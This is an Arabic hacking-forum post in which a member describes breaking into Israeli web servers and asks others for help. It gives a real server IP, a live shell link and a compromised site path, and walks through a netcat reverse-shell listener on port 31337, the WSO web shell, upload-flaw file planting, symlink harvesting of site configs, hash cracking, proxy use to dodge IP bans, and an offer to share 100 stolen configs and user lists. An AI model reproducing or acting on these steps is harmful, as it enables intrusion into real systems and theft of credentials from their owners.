حالة الموضوع:
مغلق
  1. .:: RSS ::.

    .:: RSS ::. عضوية آلية

    الأنتساب:
    ‏9 سبتمبر 2011
    المشاركات:
    14,005
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    36
    الإقامة:
    IQ-T34M
    السلام عليكم

    كيف حال الشباب

    ان شاء الله بخير

    ارجو من الأدارة ترك الموضوع لتعم الفائدة على الجميع
    ويكون لهم الاجر والثواب في اختراق المواقع الاسرئيلية

    سوف نضع سيرفرات اسرئيلية ونقوم بحل كل مشاكل الاختراق
    ان شاء الله
    انا عندي خبرة بس مش كثيرة زي بعض الأعضاء لذالك ارجو ان لا تحرمونا من حلولكم
    يلا نبدأ

    زي ما انتم عارفين السيرفرات الاسرئيلية في منها حمايتها قوية وفي اي كلام

    سوف نضع مشاكل السيرفرات الأسرئيلية الصعبة ونرجو من الجميع المشاركة لحل هذه المشاكل لتعم الفائدة
    1
    من المشاكل الي واجهتني

    هذا السيرفر

    80.244.165.88


    [​IMG]

    وهذا هو الأختصار
    ارجو ان لا يقوم أحد بحذفه
    http://abutorealty.com/images/755/aa...ar/www/vhosts/

    هذا السيرفر لا يشغل البيرل حاولوا انتم لكن انا لم ينفع معايا تشغيل البيرل
    وتخطيت المشكلة عن طريق الاتصال الكسي بالنت كت

    [​IMG]

    وهي عن طريق التصال العكسي
    وشرح الطريقة هي للتخطي الحماية
    اولأ افتح بورت بالراوتر مثلا : 81

    مثلا

    [​IMG]

    اما طريقة تثبيت الأيبي

    [​IMG]

    [​IMG]



    بعد ما ثبتنا الايبي نقوم بشرح الاتصال العكسي

    يجب اولا تحميل النت كت من

    هنا

    [​IMG]

    بعد ذلك نقوم بأستخدام احد سكربتات الأتصال العكسي وهي كثيرة جدا ويوجد شل بيرل يوجد فيه خاصية الأتصال العكسي
    ايضا يوجد شلات يوجد فيها نفس الخاصية
    انا سأستخدم شل - WSO 2.5

    قم بالتحميل الشل من
    هنا


    اول شيء قم بفتح

    [​IMG]

    بعد ذلك
    [​IMG]

    [​IMG]


    [​IMG]

    قبل ما تدعس قم يتجهيز الأتي ثم ادعس اولا على شاشة الدوس ثم على الشل ليقوم بالأتصال

    nc -v -l -p 31337

    [​IMG]

    [​IMG]

    لقد تم الأتصال عن طريث البورت
    31337
    يوجد طرق كثيرة لمعرفة اذا كان البورت مفتوح ام لا
    وأنا استخدم ويندز 8
    للذين يقولون ان ويندز 8 لا يفتح فيه بورت
    هذا للتأكيد

    [​IMG]

    انظرو لما اطبق امر id

    [​IMG]

    يمكننا الأن التنقل بداخل كل المواقع السيرقر وسحب الشل لداخل الموقع ثم تحويله من txt الى
    php
    سوف اشرح لكم كيف

    لمعرفة مسارك على السيرفر قم بكتابة الأمر
    pwd

    [​IMG]

    تقدرو ان تدخلو اينما شأتم

    انظرو كيف
    تكتب الأمر cd ثم المكان الذي تريدوه

    [​IMG]

    1: الامر
    cd /var/www/vhosts
    للدخول على ملف الذي يوجد به المواقع

    2:
    الامر
    ls -la
    لمعرفة الملفات الموجودة داخل المجلد +التصريح للملفات

    لو حبيت تدخل موقع لأختراقه

    [​IMG]

    [​IMG]

    [​IMG]

    [​IMG]

    [​IMG]

    [​IMG]

    [​IMG]

    [​IMG]

    [​IMG]

    [​IMG]

    [​IMG]

    [​IMG]

    [​IMG]

    [​IMG]

    هيك رفعنا ملف الأبلود
    trail-camera.co.il/images/11.php

    الأن نقم برفع الشل

    لكن ضل مشكلة انو ما معنا صلاحية اني اعدل على الاندكس وأخترق الموقع ارجو من الأدارة والأعضاء والمشرفين وذوي الخبرة ان يساعدونا في حل هذه المشكلة

    ==================

    اصلو فيه سيرفرات اسرئيلية بتحظر الايبي وانا عانين من هذه القصة معانا شديدة
    كنت احاول ان اركب السيرفر الاسرئيلي

    رفعت الشل على سيرفر عن طريق ثغرة ابلود باحد المواقع الاسرئيلية وعرض معايا الشل وسحبت اختصار للسيرفر وكان زابط وبديت اخترق واول ما فكر اخترق راح السيرفر عرف اني طالع على السيرفر قام بعمل باند للايبي الشخصي

    قمت بتغير الايبي عن طريق البرنامج البروكسي المجاني هوت سبوت Hotspot Shield

    وبط وبديت احاول اخترق السيرفر كان نفسي اطلع السيرفر الاسرئيلي واخليه عبرة لمن لم يعتبر بس والله انو الحماية قوية جدا

    حسيت انو بيعرف كل اشي بعمله كل موقع احاول اقرأ الكونفق وابدأ اغير البيانات كان على طول يغلق الموقع ويعمل
    ساس بندد يعني يغلق الموقع من السيرفر من لحة يمكن whmcs

    وضليت على هذا الحال

    والحمد الله انو ما كان عارف الثغرة اي كنت برفع منها الشل كل ما يذف الشل اروح ارفعه عن طريق الثغرة واشوف موقع تاني واطلع عليه علشان ما يعرف وبرضو كان يقوم بتوقيف اي موقع اخترقه او اطلع عليه

    حتى اني كنت ما برفع شلات كنت برفع ملف صغير كتير للأبلود يعني فش ولا برنامج حامية بيمسكو لانه مش شل علشان يمسكه لا ملف للرفع فقط

    وكان هذا كله بنفس اليوم كنت حرب انا وصاحب السيرفر صارت القصة تحدي نفسي اني ادعس على مواقع الاسرئلية واعمل فيع زي ما بعمل بالسيرفرات الاخرى
    وهان كانت المشكلة انو حمى حالو من عملية انك تسحب اختصر للسيرفر صار يجيلي Forbidden

    قلت مش مشكلة رحت شغل البيرل وسحبت كونفق السيرفر الي مركبين جوملا وورد بريس


    وبرضو كل ما بسحب على موقع او برفع ملف ابلود او اداة sql

    كان يعرف مش عاارف كيف ويقوم برضو باغلاق الموقع واعادة الباك اب القديم

    حتى اني كان معايا حسابات سيبانيل

    :2082
    وقام بمنعي من الدخول على السيبانيل :2082

    ارجو التوضيح كيف بحمي حالو منها


    وكل هذا وكان كل ايبي اقوم برفع sql او ابلود او شل كان ياكل الموقع المستهدف باند

    قلت مش مشكلة ضل موقع كنو نسى يغير بيناته للدخول وكان موقع مركب جوملا

    سيبت 3 ايام السيرفر ويوم من الايام بالليل الساعة 3 كنو كان صاحب السيرفر نايم او انا بتهيالي انو في حد هوا الي بيقوم بكل هذه العمايل من اغلاق ومس الشلات وغيره

    المهم اخذت راحتي وصرت ابد أ اتخبى على السيرفر رحت رفعت sql وبديت اتخبئ على السيرفر اقرأ الكونفق وابدأ احاول افك الهاش للباس الدخول واذا ما قدرت اقوم بالتعديل عليه ثم ارجاعه زي ما كان من الاول
    وتخبيت تقريبا على 20 موقع وقلت بكرة بلعن شرفه للسيرفر الاسرئيلي

    تفاجأت انو كل المواقع الي انا كنت مخبي ملف ابلود او شل او sql كانوا يا محذوفين يا الموقع كله مغلق وما زبط الموضوع وصرت احلم اني ادمر السيرفر حلم ومش عارف انام بالصدفة لقيت موقع واحد ضايل قلت الحمد الله فيه امل الحمد الله


    وهذا كله بعد ما صار حاجب كل الايبهات الي منت اخش عليها حتى اني استخدمت كل البرامج المجانية للبروكسي الي بتديك يوم ولا اثنين حتى الايبيات الي بتركب على المتصفح فيرفوكس تقريبا كل ايبي احطه يوكل باند من صاحب السيرفر

    ===
    قلت مش مشكلة سبته الموقع الي كان لسى متخبي عليه قلت بلاش يعرف ورحت لصاحبي claw
    واستشرته انو لو في طريقة بدال ما اسحب الكونفق للمواقع على السيرفر نفسه
    لا اني اضغطهم بملف مضغوط واعملهم على الجهاز وابدا افتحهم على الجهاز وابدا اخترق
    حكالي انو بينفع ورديت على كلامع ورحت اعملها وسحبتهم وحطيتهم بمجلد ورحت وضعت امر الضغط للمجلد وضغطتهم وقمت بتحميلهم على الجهاز بلمف مضغوط
    وحاولت اني افكهم ما نفعت الطريقة وكانت فاشلة لأنها بتزبط على كونفق واحد فقط ويمكن حتى ما بتزبط ارجو من الخبراء توضيح هذه النقطة
    كل ما احول افك الملف المضغو او اني افتحه كا يقلي الملف eror
    الملف معطوب ولا كونفق رضى انو يفتح مع انو الملف المضغوط كان له حجم يعني زي الي ملان بس كان خربان
    وسحبت اكتر من واحد وحاولت بكل انواع الصيغ اني اضغط وما زبطت الطريقة

    يمكن علشان هذول الكوفقتات اختصارات وما بيفتحو الا على السيرفر نفسه وما زبطت الطريقة بس يريت في طريقة زي هيك احلى بكون الشغل بتصير ترفه ملف sql وتبدا تفتح الكوفق على الجهاز وتخترق بالاداة المرفوعة


    رحت عملت طريقة تانية مقرفة شوي

    صرت اخش على كول كونفق واخذه واحطه بملف .txt مفكر
    على الجهاز بأسم اليوزر الموقع وكنت قبل هيك عملت ملف .html بالفرونت بيج وضعت المواقع واقبالها اليوزرات

    من سكربت سكربت Symlink Sa 2.0

    بس على الجهاز المواقع واليوزرات

    وزبطت شوي الطريقة وسحبت على جهازي 100 كونفق كلهم بصيغة .txt

    بس المشكلة انو كل المواقع الي كنت رافع عليها الشلات او الابلود او sql انكشفو
    حتى الثغرة الي كنت ارفع منها الشلات عرف المكان الي برفع منو ووضع جدار ناري للمجلد وكان اسمه admin
    والمشكلة كمان حظر كل الايبهات ولغى البورت .2082 للسيبانيل مش عليا انا فقط لا على كل الناس
    حتى اني صرت اكلم صحابي على الاميل وصرت اكلم الي بعرفه والي بعرفوش على انو يحل المشكلة وعلى الفاضي
    كا على طول بيحذرالايبهات وما عرفو ا
    انا بدنا نتشارك كلنا في حل المشكلة
    ونا بدي ارفع 100 كونفق واليوزرات والمواقع والايبي السيرفر الاسرئيلي علشان نحل قصتها لأنو كتير سيرفرات اسرئيلية نفس القصة



     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة